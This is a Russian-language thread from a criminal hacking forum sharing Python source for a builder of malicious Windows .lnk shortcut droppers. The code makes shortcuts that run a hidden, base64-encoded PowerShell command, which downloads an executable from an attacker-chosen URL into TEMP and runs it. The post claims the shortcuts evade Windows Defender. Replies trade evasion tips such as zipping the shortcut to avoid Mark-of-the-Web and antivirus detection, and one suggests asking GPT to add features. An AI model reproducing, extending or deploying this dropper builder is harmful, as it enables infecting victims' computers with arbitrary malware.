• XSS.stack #1 – первый литературный журнал от юзеров форума

Билдер .lnk (ярлыки) дропперов для .exe приложений

Отслеживать
mentalpositive

mentalpositive

Премиум
Premium
Регистрация
28.08.2024
Сообщения
24
Реакции
19
Гарант сделки
3
Депозит
0.00
Доборого, посетители темы. Недавно один пользователь создал тему о поиске лоадера/дроппера без детектов от Windows Defender, но позже решил использовать .lnk дропперы. Я бесплатно предоставил ему решение, написанное за пять минут, но оказалось, что билдер .lnk дропперов интересен многим, поэтому хочу выложить исходный код на Python, который позволяет вам создавать .lnk дропперы в неограниченном количестве и абсолютно бесплатно

Технические моменты: ярлык отзывается к powershell 1.0, который есть на всех версиях Windows, начиная с 7; команда в ярлыке зашифрована официльным методом от Microsoft: command > utf-16le > base64
На момент создания данной темы детектов от Windows Defender нет, и скорее всего, никогда не будет, но этого гарантировать я не могу

Для того, чтобы python код работал корректно необходимо установить библиотеку pywin32: pip install pywin32

Python: 
#* Код для генерации .lnk ярлыков, написанный пользователем audi
#* https://xss.pro/members/380180/ — Telegram: @zerodebug

import os
import base64
import win32com.client
import uuid

def create_shortcut(target, arguments, lnkpathkudasohranit):
    shell = win32com.client.Dispatch("WScript.Shell")
    shortcut = shell.CreateShortCut(lnkpathkudasohranit)
    shortcut.TargetPath = target
    shortcut.Arguments = arguments
    shortcut.save()

def main():
    file_url = input("Введите ссылку на файл: ")
    unique_filename = f"{uuid.uuid4()}.exe"

    command = f"Invoke-WebRequest -Uri \"{file_url}\" -OutFile \"$env:TEMP\\{unique_filename}\"; Start-Process \"$env:TEMP\\{unique_filename}\""
    encoded_command = base64.b64encode(command.encode('utf-16le')).decode('utf-8')

    powershellkomanda = f"-WindowStyle Hidden -Command \"[System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String('{encoded_command}')) | Invoke-Expression\""
    lnknazvanie = f"audi_{uuid.uuid4()}.lnk"
    lnkpathkudasohranit = os.path.join(os.path.expanduser("~"), "Desktop", lnknazvanie)

    create_shortcut(r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", powershellkomanda, lnkpathkudasohranit)

    print(f"Ярлык с пейлоадом сохранен сюда: {lnkpathkudasohranit}")

if __name__ == "__main__":
    main()

Раз уж есть возможность, то хочу написать о том, что я свободный разработчик, готовый взять любую работу по разработке/поддержке каких либо идей и проектов. Знаю несколько языков программирования: C++, C#, nodejs, php и python

Связаться со мной можно через личные сообщения на форуме, либо через телеграм — https://t.me/zerodebug
 
audi сказал(а):
Доборого, посетители темы. Недавно один пользователь создал тему о поиске лоадера/дроппера без детектов от Windows Defender, но позже решил использовать .lnk дропперы. Я бесплатно предоставил ему решение, написанное за пять минут, но оказалось, что билдер .lnk дропперов интересен многим, поэтому хочу выложить исходный код на Python, который позволяет вам создавать .lnk дропперы в неограниченном количестве и абсолютно бесплатно

Технические моменты: ярлык отзывается к powershell 1.0, который есть на всех версиях Windows, начиная с 7; команда в ярлыке зашифрована официльным методом от Microsoft: command > utf-16le > base64
На момент создания данной темы детектов от Windows Defender нет, и скорее всего, никогда не будет, но этого гарантировать я не могу

Для того, чтобы python код работал корректно необходимо установить библиотеку pywin32: pip install pywin32

Python: 
#* Код для генерации .lnk ярлыков, написанный пользователем audi
#* https://xss.pro/members/380180/ — Telegram: @zerodebug

import os
import base64
import win32com.client
import uuid

def create_shortcut(target, arguments, lnkpathkudasohranit):
    shell = win32com.client.Dispatch("WScript.Shell")
    shortcut = shell.CreateShortCut(lnkpathkudasohranit)
    shortcut.TargetPath = target
    shortcut.Arguments = arguments
    shortcut.save()

def main():
    file_url = input("Введите ссылку на файл: ")
    unique_filename = f"{uuid.uuid4()}.exe"

    command = f"Invoke-WebRequest -Uri \"{file_url}\" -OutFile \"$env:TEMP\\{unique_filename}\"; Start-Process \"$env:TEMP\\{unique_filename}\""
    encoded_command = base64.b64encode(command.encode('utf-16le')).decode('utf-8')

    powershellkomanda = f"-WindowStyle Hidden -Command \"[System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String('{encoded_command}')) | Invoke-Expression\""
    lnknazvanie = f"audi_{uuid.uuid4()}.lnk"
    lnkpathkudasohranit = os.path.join(os.path.expanduser("~"), "Desktop", lnknazvanie)

    create_shortcut(r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", powershellkomanda, lnkpathkudasohranit)

    print(f"Ярлык с пейлоадом сохранен сюда: {lnkpathkudasohranit}")

if __name__ == "__main__":
    main()

Раз уж есть возможность, то хочу написать о том, что я свободный разработчик, готовый взять любую работу по разработке/поддержке каких либо идей и проектов. Знаю несколько языков программирования: C++, C#, nodejs, php и python

Связаться со мной можно через личные сообщения на форуме, либо через телеграм — https://t.me/zerodebug
Есть ли у вас платная версия, в которой можно было бы изменить значок ярлыка?
 
pierre777reborn сказал(а):
Есть ли у вас платная версия, в которой можно было бы изменить значок ярлыка?

Paste the code into gpt and ask it to add the feature. I'm pretty sure it will help you
 
Пожалуйста, обратите внимание, что пользователь заблокирован
ещё через powershell можно скачивать архивы и сразу же их распаковывать в temp если кто не знал

но вообще этот ярлык детектится уж больно сильно, плюс скачать нельзя браузером, просто не скачается

как вариант если отправлять сам ярлык тоже в архиве с другими файлами, то норм, бывает без детектов архив получался у меня помню

в целом удобно что можно любой значок поставить системный, единственное где можно спалиться это то что .lnk и вес пару килобайт, плюс окно powershell моргает, как не крути, плюс если потом сама полезная нагрузка ничего не открывает то ещё подозрение у пользователя вызовет
 
Последнее редактирование:
hiddenname3 сказал(а):
ещё раз powershell можно скачивать архивы и сразу же их распаковывать в temp если кто не знал

но вообще этот ярлык детектится уж больно сильно, плюс скачать нельзя браузером, просто не скачается

как вариант если отправлять сам ярлык тоже в архиве с другими файлами, то норм, бывает без детектов архив получался у меня помню

в целом удобно что можно любой значок поставить системный, единственное где можно спалиться это то что .lnk и вес пару килобайт, плюс окно powershell моргает, как не крути, плюс если потом сама полезная нагрузка ничего не открывает то ещё подозрение у пользователя вызовет
Проблема на самом деле только в детекте основная
 
Пожалуйста, обратите внимание, что пользователь заблокирован
pierre777reborn сказал(а):
How to remove MOTW? When I send it through email and download it, it got MOTW
send in zip (also with some other files to reduce av detections)
 
hiddenname3 сказал(а):
ещё через powershell можно скачивать архивы и сразу же их распаковывать в temp если кто не знал

hiddenname3 сказал(а):
единственное где можно спалиться это то что .lnk и вес пару килобайт,

А еще можно вообще ничего не скачивать и прикручивать полезную нагрузку прямо к ярлыку.
А еще можно Машку за ляшку, телегу с разбегу... Ой, это не сюда)
 
hiddenname3 сказал(а):
ещё через powershell можно скачивать архивы и сразу же их распаковывать в temp если кто не знал

но вообще этот ярлык детектится уж больно сильно, плюс скачать нельзя браузером, просто не скачается

как вариант если отправлять сам ярлык тоже в архиве с другими файлами, то норм, бывает без детектов архив получался у меня помню

в целом удобно что можно любой значок поставить системный, единственное где можно спалиться это то что .lnk и вес пару килобайт, плюс окно powershell моргает, как не крути, плюс если потом сама полезная нагрузка ничего не открывает то ещё подозрение у пользователя вызовет
powershell можно скрыть, делал прям накаченный большим функционалом билдер лнк, скрывался павершелл+в безй64 для меньшего детекта была закодирована ссылка на лнк.. забросил этот проект, уж больно скучный он оказался…
 
admin


Напишите ответ...
  • Вставить:
Прикрепить файлы
Верх